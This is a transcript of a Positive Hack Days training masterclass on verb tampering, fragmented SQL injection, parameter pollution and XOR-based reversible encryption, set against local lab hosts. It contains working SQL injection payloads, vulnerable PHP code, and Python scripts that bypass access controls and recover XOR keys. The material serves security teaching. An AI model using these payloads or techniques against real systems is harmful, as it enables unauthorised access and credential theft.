Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases

Vulnerabilities in Web – difficulties (masterclass)

Description

A participant will acquire the following skills: detecting complex vulnerabilities in web applications, manually analyzing the results of web application security scans, and assessing the effectiveness of specialized protection such as a web application firewall.

Transcript of Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases

Page 1: Positive Hack Days. Goltsev. Web Vulnerabilities: Difficult Cases

Vulnerabilities in Web – difficulties

(masterclass)

Page 2

Greetings

Page 3

Questions to discuss

• HTTP Verb Tampering

• Fragmented SQL Injections

• HTTP Parameter Pollution

• Reversible encryption

Page 4

HTTP Verb Tampering

HTTP Verb Tampering is an access control error for HTTP methods: the restriction is applied to some methods (typically GET and POST) while the same resource remains reachable with others.

• Administration (configuration) error

• Particular case: the vendor's error

Page 5

HTTP Verb Tampering

What’s the method?

Page 6

HTTP Verb Tampering

Why?

Page 7

HTTP Verb Tampering

Exploitation

• Real-life example (JBoss authentication bypass)

Page 8

HTTP Verb Tampering

Exploitation

• Practical task: http://stat.local/

[Slide screenshots: the .htaccess file, the result of a GET request, and the result of a HACK request]
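The misconfiguration behind the stat.local task, modelled end to end as an added example (this is not the talk's stat.local setup or the JBoss code): a toy server that, like an Apache .htaccess with Require valid-user placed inside <Limit GET POST>, challenges only GET and POST, and a probe that sends several verbs, including a made-up one, and records the status codes. The credentials, the /stats/ path and the HACK verb are constructed for the example.

```python
"""HTTP verb tampering: a per-method access control that gates only GET and
POST, probed with an arbitrary verb. Added example, not from the talk."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials for the toy "stats" area.
VALID_CREDS = base64.b64encode(b"admin:secret").decode()

# Assumption: the target's .htaccess looks like
#     AuthType Basic
#     AuthUserFile /etc/apache2/.htpasswd
#     <Limit GET POST>
#         Require valid-user
#     </Limit>
# so only GET and POST are challenged; any other verb falls through to the
# handler, which serves the protected resource anyway.
MISCONFIGURED = {"GET", "POST"}
FIXED = None   # Require valid-user outside any <Limit>: every method is gated


class StatsHandler(BaseHTTPRequestHandler):
    """Serves /stats/ and enforces auth only for the verbs in server.limited."""

    def log_message(self, *args):
        pass  # keep the example quiet

    def __getattr__(self, name):
        # BaseHTTPRequestHandler dispatches on do_<VERB>; route every verb,
        # including made-up ones such as HACK, to the same handler.
        if name.startswith("do_"):
            return self._serve
        raise AttributeError(name)

    def _serve(self):
        limited = self.server.limited
        gated = limited is None or self.command in limited
        authorized = self.headers.get("Authorization") == "Basic " + VALID_CREDS
        if gated and not authorized:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="stats"')
            self.end_headers()
            return
        body = b"secret statistics\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)


def probe(verbs, limited=MISCONFIGURED, auth=None):
    """Start the toy server, send each verb to /stats/, return {verb: status}."""
    server = HTTPServer(("127.0.0.1", 0), StatsHandler)
    server.limited = limited
    threading.Thread(target=server.serve_forever, daemon=True).start()
    results = {}
    try:
        for verb in verbs:
            conn = http.client.HTTPConnection("127.0.0.1", server.server_port, timeout=5)
            headers = {"Authorization": "Basic " + auth} if auth else {}
            conn.request(verb, "/stats/", headers=headers)
            resp = conn.getresponse()
            resp.read()
            results[verb] = resp.status
            conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return results


if __name__ == "__main__":
    print("misconfigured:", probe(["GET", "POST", "HEAD", "HACK"]))
    print("fixed:        ", probe(["GET", "POST", "HEAD", "HACK"], limited=FIXED))
```

With the misconfigured rule set GET and POST come back 401 while HEAD and HACK return the protected content; with Require valid-user outside any <Limit> every verb is challenged. <LimitExcept GET POST> is the complementary mistake (it gates everything except GET and POST), so unless a method-specific rule is really intended the Require directive should not sit inside either. A security constraint in a servlet web.xml that lists only GET and POST in http-method elements has exactly the same shape, which is what the JBoss jmx-console case on the previous slide came down to.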

Page 9

Fragmented SQL Injections

SQL injection is a vulnerability caused by incorrect processing of input data by the application. User-supplied data passed through the web application is altered to modify the SQL query, and the modified query is used for exploitation.

• Insufficient data filtering

Page 10

Fragmented SQL Injections

What’s the method?

Do not forget correct filtering!

Structure of a valid query (MySQL database):

INSERT INTO table1 (c1,c2) VALUES ('value1','value2');

The same query with injected SQL commands:

INSERT INTO table1 (c1,c2) VALUES ('a\' , ', user()); -- 1');

Page 11

Fragmented SQL Injections

Why?

If the backslash ("\") is not filtered, an attacker can use it to escape the next character in the database query, a single or double quote, so that the quote is no longer interpreted as the end of the string literal.

Required for exploitation: the query must contain more than one string variable (the escaped quote merges the first literal with the next one, whose opening quote then terminates it, so the attacker never has to send a quote).

Remember: it is necessary to filter not only user data but also data read back from the database.

Page 12

Fragmented SQL Injections

Exploitation

• Real-life example (Coppermine Photo Gallery <= 1.4.19)

The "\" character is not filtered in GET, POST or REQUEST data.

"\" can be specified in the email parameter.

Exploitation is possible through a later (second-order) database query, issued when system features are accessed after authentication.

Page 13

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/index.php

"Bug tracking system for source code".

Page 14

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/add.php

Vulnerable code (add.php file):

if (isset($_POST['code']) && isset($_POST['fix'])) {
    // htmlspecialchars() leaves "\" (and, with its default flags, "'") untouched
    $code = htmlspecialchars($_POST['code']);
    $fix  = htmlspecialchars($_POST['fix']);
    ....
    mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");
}

The database query looks as follows:

INSERT INTO track (bug,fix) VALUES ('value1','value2');

Page 15

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/add.php

With the injected values (code = value1\ and fix = , user()) -- 1) the database query looks as follows:

INSERT INTO track (bug,fix) VALUES ('value1\',', user()) -- 1');

Page 16

Fragmented SQL Injections

Exploitation

• Practical task

http://tracker.local/view.php

As a result, the fix column of the track table contains the result of the user() function (visible through view.php).
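The tracker.local task replayed as an added example (not the talk's code): it builds the add.php INSERT the way the vulnerable PHP does, runs the result through a minimal scanner for MySQL string literals, and shows the statement the parser actually sees, first with htmlspecialchars() and then with backslash-aware escaping. The two form values are the slide's; the helper names and the mysql_real_escape_string approximation are this example's own.

```python
"""Fragmented SQL injection: a stray backslash in the first string literal
swallows its closing quote, and the template's own quote for the second value
then closes the merged literal. Added example, not the talk's code."""

# Constructed form fields for the add.php handler shown on the slides.
CODE = "value1\\"              # sent as   value1\
FIX = ", user()) -- 1"         # closes the VALUES list, injects user()

TEMPLATE = "INSERT INTO track (bug,fix) VALUES ('{}','{}')"
EXPECTED_SHAPE = "INSERT INTO track (bug,fix) VALUES (?,?)"


def html_only(value: str) -> str:
    """What PHP htmlspecialchars() does with its default flags: it rewrites
    & < > and the double quote, but touches neither ' nor the backslash."""
    return (value.replace("&", "&amp;").replace("<", "&lt;")
                 .replace(">", "&gt;").replace('"', "&quot;"))


def mysql_escape(value: str) -> str:
    """Approximation of mysql_real_escape_string(): the backslash is escaped
    too, so it can no longer swallow the quote that follows it."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


def build_insert(code: str, fix: str, escape=html_only) -> str:
    return TEMPLATE.format(escape(code), escape(fix))


def string_literals(sql: str):
    """Minimal scanner for MySQL single-quoted literals (backslash escapes the
    next character, '' is a literal quote, '-- ' and '#' start a comment).
    Returns the literal contents and the statement with each literal replaced
    by '?', i.e. the shape the parser actually sees."""
    literals, shape, i, n = [], [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if sql.startswith("-- ", i) or ch == "#":
            break                                   # rest is a comment
        if ch != "'":
            shape.append(ch)
            i += 1
            continue
        i += 1                                      # opening quote
        buf = []
        while i < n:
            c = sql[i]
            if c == "\\" and i + 1 < n:
                buf.append(sql[i + 1]); i += 2      # escaped character
            elif c == "'" and i + 1 < n and sql[i + 1] == "'":
                buf.append("'"); i += 2             # doubled quote
            elif c == "'":
                i += 1; break                       # closing quote
            else:
                buf.append(c); i += 1
        literals.append("".join(buf))
        shape.append("?")
    return literals, "".join(shape).strip()


def injection_succeeds(code: str, fix: str, escape=html_only) -> bool:
    """True when the statement the parser sees no longer matches the template."""
    _, shape = string_literals(build_insert(code, fix, escape))
    return shape != EXPECTED_SHAPE


if __name__ == "__main__":
    for name, esc in (("htmlspecialchars", html_only),
                      ("mysql_real_escape_string", mysql_escape)):
        sql = build_insert(CODE, FIX, esc)
        print(name, "->", sql)
        print("   parser sees:", string_literals(sql))
```

With htmlspecialchars() the parser sees VALUES (?, user()) with a single literal value1', : the first value's backslash escaped the template's closing quote, the template's opening quote for the second value closed the merged literal, and everything after -- is a comment. Neither input contains a quote, which is why filtering quotes alone (ENT_QUOTES, a WAF rule on ') does not help. With the backslash escaped as well the shape is VALUES (?,?) again. Escaping is the talk's framing; the durable fix is a prepared statement (mysqli or PDO with bound parameters), where no string of the user's ever reaches the SQL lexer.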

Page 17

HTTP Parameter Pollution

HTTP Parameter Pollution is a vulnerability that arises because different platforms (web server and application language) handle a sequence of HTTP request parameters with the same name differently.

Page 18

HTTP Parameter Pollution

Technology / environment                      Interpretation of duplicates   Example
ASP.NET / IIS                                 concatenated with a comma      par1=val1,val2
ASP / IIS                                     concatenated with a comma      par1=val1,val2
PHP / Apache                                  last parameter wins            par1=val2
PHP / Zeus                                    last parameter wins            par1=val2
JSP, Servlet / Apache Tomcat                  first parameter wins           par1=val1
JSP, Servlet / Oracle Application Server 10g  first parameter wins           par1=val1
JSP, Servlet / Jetty                          first parameter wins           par1=val1
IBM Lotus Domino                              first parameter wins           par1=val1
IBM HTTP Server                               last parameter wins            par1=val2
mod_perl, libapreq2 / Apache                  first parameter wins           par1=val1
Perl CGI / Apache                             first parameter wins           par1=val1
mod_perl / Apache                             first parameter wins           par1=val1
mod_wsgi (Python) / Apache                    returns an array               ARRAY(0x8b9058c)
Python / Zope                                 first parameter wins           par1=val1
IceWarp                                       returns an array               ['val1','val2']
AXIS 2400                                     last parameter wins            par1=val2
Linksys Wireless-G PTZ Internet Camera        concatenated with a comma      par1=val1,val2
Ricoh Aficio 1022 Printer                     last parameter wins            par1=val2
webcamXP Pro                                  first parameter wins           par1=val1
DBMan                                         joined with two tildes         par1=val1~~val2

Page 19

HTTP Parameter Pollution

The PHP case.

An interesting setting: variables_order in php.ini. It defines the order in which the GET, POST and cookie sources are registered, and hence which source wins in $_REQUEST when the same name appears in several of them (unless request_order overrides it).

Why is it interesting?

GET /?id=1
Cookie: id=2

Result:

$_GET['id'] = 1
$_REQUEST['id'] = 2

A frequent error in request processing: $_GET is checked, but the value is taken from $_REQUEST.

Page 20

HTTP Parameter Pollution

Exploitation

• Real-life example (www.blogger.com blog service)

Vulnerability reported under the "Rewarding web application security research" program.

Error in processing the input settings: the first matching value is validated, but the last one ends up in the result.

Presumably the check is done on QUERY_STRING, and the variable is then assigned from the array of data parsed from the request.
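The three HPP behaviours discussed on the last slides, combined into one added example (not code from the talk or from blogger.com): a resolver that applies each duplicate-handling policy from the table to a query string, the blogger.com-style mismatch where one layer validates the first value and another uses the last, and a model of how PHP merges sources into $_REQUEST so that the "check $_GET, use $_REQUEST" error can be seen. The policy names, the id parameter, the cookie value and the SQL sink are constructed for the example. Modern php.ini-production sets request_order = "GP", which keeps cookies out of $_REQUEST; the merge logic is unchanged, which the order argument shows.

```python
"""HTTP Parameter Pollution: how different platforms resolve a repeated
parameter name, and the PHP $_GET-checked / $_REQUEST-used mismatch.
Added example, not from the talk."""
from urllib.parse import parse_qsl

# Resolution rules from the talk's table; the policy names are this example's.
POLICIES = {
    "first": lambda vals: vals[0],            # Tomcat, Jetty, Perl CGI, Zope ...
    "last":  lambda vals: vals[-1],           # PHP/Apache, IBM HTTP Server ...
    "comma": lambda vals: ",".join(vals),     # ASP and ASP.NET on IIS
    "array": lambda vals: list(vals),         # mod_wsgi, IceWarp
}


def resolve(query: str, policy: str) -> dict:
    """Group a query string by name and collapse duplicates per policy."""
    groups = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        groups.setdefault(name, []).append(value)
    return {name: POLICIES[policy](vals) for name, vals in groups.items()}


def checked_then_used(query: str, check_policy: str, use_policy: str):
    """The blogger.com-style bug: one layer validates the value it resolves,
    another layer resolves the same name differently and uses that instead."""
    checked = resolve(query, check_policy).get("id", "")
    if not checked.isdigit():
        return "rejected"
    return resolve(query, use_policy)["id"]


def php_request(get: dict, post: dict, cookie: dict, order: str = "GPC") -> dict:
    """Build $_REQUEST the way PHP does: merge the sources in the configured
    order (variables_order, or request_order when set); a later source
    overwrites an earlier one for the same key."""
    sources = {"G": get, "P": post, "C": cookie}
    merged = {}
    for letter in order:
        merged.update(sources.get(letter, {}))
    return merged


def vulnerable_lookup(get, post, cookie, order="GPC"):
    """The frequent PHP error from the slide: $_GET['id'] is validated, but
    the value that reaches the query is taken from $_REQUEST['id']."""
    if not get.get("id", "").isdigit():
        return "rejected"
    request = php_request(get, post, cookie, order)
    return "SELECT * FROM posts WHERE id=" + request["id"]   # constructed sink


def fixed_lookup(get, post, cookie, order="GPC"):
    """Validate and use the same variable."""
    value = get.get("id", "")
    if not value.isdigit():
        return "rejected"
    return "SELECT * FROM posts WHERE id=" + value


if __name__ == "__main__":
    for policy in POLICIES:
        print(f"{policy:5}: par1=val1&par1=val2 ->", resolve("par1=val1&par1=val2", policy))
    print(checked_then_used("id=1&id=1 OR 1=1", "first", "last"))
    print(vulnerable_lookup({"id": "1"}, {}, {"id": "2 OR 1=1"}))
```

The two failure modes have the same root: validation and use resolve the name through different code paths. A WAF or a front-end check that sees the first value while the application sees the last (or a comma-joined pair) is bypassed the same way, so when assessing a filter send the duplicate once with the payload first and once with it last.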

Page 21

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/index.php

Page 22

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/register.php

Page 23

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/invite.php


Page 25

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/invite.php

gpc_order setting (php.ini): "GPC"

Page 26

HTTP Parameter Pollution

Exploitation

• Practical task

http://blogger.local/add.php

Page 27

Reversible Encryption

Reversible encryption in web applications is a potential weakness: whatever is stored that way (passwords, tokens) can be decrypted rather than having to be cracked once an attacker obtains the ciphertext, for example through:

• exploitation of an SQL injection vulnerability;

• information disclosure (a database dump);

• arbitrary file reading;

• and so on.

Page 28

Reversible Encryption

Exploitation

• Practical task

http://portal.local


Page 31

Reversible Encryption

Exploitation

• Practical task

http://portal.local/news.php


Page 34

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

Page 35

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

http://portal.local/xor_tool/

Page 36

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

FAILED.

Page 37

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

1. “test” user with “12345678910qwerty” password

2. test : UFBQR1FQRk9cQ0QIFgcRBx0=

Page 38

Reversible Encryption

Exploitation

• Practical task

http://portal.local/

http://portal.local/xor_tool/
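The xor_tool step of the portal.local task, redone as an added example (not the talk's tool): given the "test" user's password and the stored token from the previous slide, it derives the key stream by XORing the decoded token with the known plaintext, finds the length after which that stream repeats, and then uses the recovered key to decrypt and re-encrypt tokens. The scheme assumed is base64 over a repeating-key XOR, which the length match between the decoded token and the password supports; the function names are this example's own.

```python
"""Reversible encryption in the wild: a repeating-key XOR "cipher" broken with
one known plaintext. Added example, not the talk's xor_tool."""
import base64
from itertools import cycle

# The sample pair from the slide: user "test", the password chosen at
# registration, and the stored token for that user.
PASSWORD = "12345678910qwerty"
TOKEN = "UFBQR1FQRk9cQ0QIFgcRBx0="


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with the key repeated as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def keystream_from_known_plaintext(token_b64: str, plaintext: str) -> bytes:
    """c = p XOR k, so k = c XOR p wherever p is known."""
    ciphertext = base64.b64decode(token_b64)
    plain = plaintext.encode("latin-1")
    if len(ciphertext) != len(plain):
        raise ValueError("XOR preserves length; this token is not a plain XOR of the password")
    return xor_bytes(ciphertext, plain)


def shortest_period(stream: bytes) -> int:
    """Smallest p such that stream[i] == stream[i-p] for every i >= p."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return len(stream)


def recover_key(token_b64: str, plaintext: str) -> bytes:
    """Return the repeating key implied by one known plaintext/ciphertext pair.
    Caveat: only len(sample) - period positions confirm the period; use a
    longer plaintext or a second account before trusting the result."""
    stream = keystream_from_known_plaintext(token_b64, plaintext)
    return stream[: shortest_period(stream)]


def decrypt_token(token_b64: str, key: bytes) -> str:
    return xor_bytes(base64.b64decode(token_b64), key).decode("latin-1")


def encrypt(plaintext: str, key: bytes) -> str:
    """What the application does: XOR with the key, then base64."""
    return base64.b64encode(xor_bytes(plaintext.encode("latin-1"), key)).decode()


if __name__ == "__main__":
    key = recover_key(TOKEN, PASSWORD)
    print("key stream:   ", keystream_from_known_plaintext(TOKEN, PASSWORD))
    print("repeating key:", key)
    # Any other user's token now decrypts with the same key.
    print(decrypt_token(encrypt("someone else's password", key), key))
```

On the slide's pair the key stream repeats after 12 bytes, so every other user's token decrypts with that 12-byte key: that is the practical difference between reversible "encryption" and a salted password hash, and why one registered account was enough for the task. The caveat in recover_key applies: 17 bytes of known plaintext confirm a 12-byte period at only five positions, so a second known plaintext (another account you registered) should agree before the key is trusted.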

Page 39

Instead of conclusions

What’s next?

Try to do practical tasks

Take part in competitions

Page 40

Thank you for your attention!

Questions?
